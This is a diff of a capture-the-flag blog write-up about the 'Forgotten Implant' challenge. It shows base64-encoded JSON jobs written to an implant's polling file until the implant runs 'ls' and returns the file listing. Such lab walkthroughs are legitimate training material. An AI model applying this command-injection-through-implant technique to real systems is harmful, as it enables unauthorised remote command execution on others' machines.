noncenz/noncenz.github.io/_posts/2023-08-01-Forgotten Implant .md

 Decoding the base 64 we see `{"success": false, "result": "Encoding error"}`

 OK, so it wants base 64.
-On the next round we send:
+On the next round we'll encode the payload:

 `echo 'ls' | base64 > get-job/ImxhdGVzdCI=`

-and get back:
+The implant reads this and returns:

 `{"success": false, "result": "JSON error"}`

+Now it wants JSON.
+At least we're moving forward!
 Let’s try the JSON format we received in the heartbeat message.
 We submit:

 `echo '{"job_id": 0, "cmd": "ls"}' | base64 > get-job/ImxhdGVzdCI=`

-and get back:
+With this we get back:

 `{"job_id": 0, "cmd": "ls", "success": true, "result": "products.py\nuser.txt\n"}`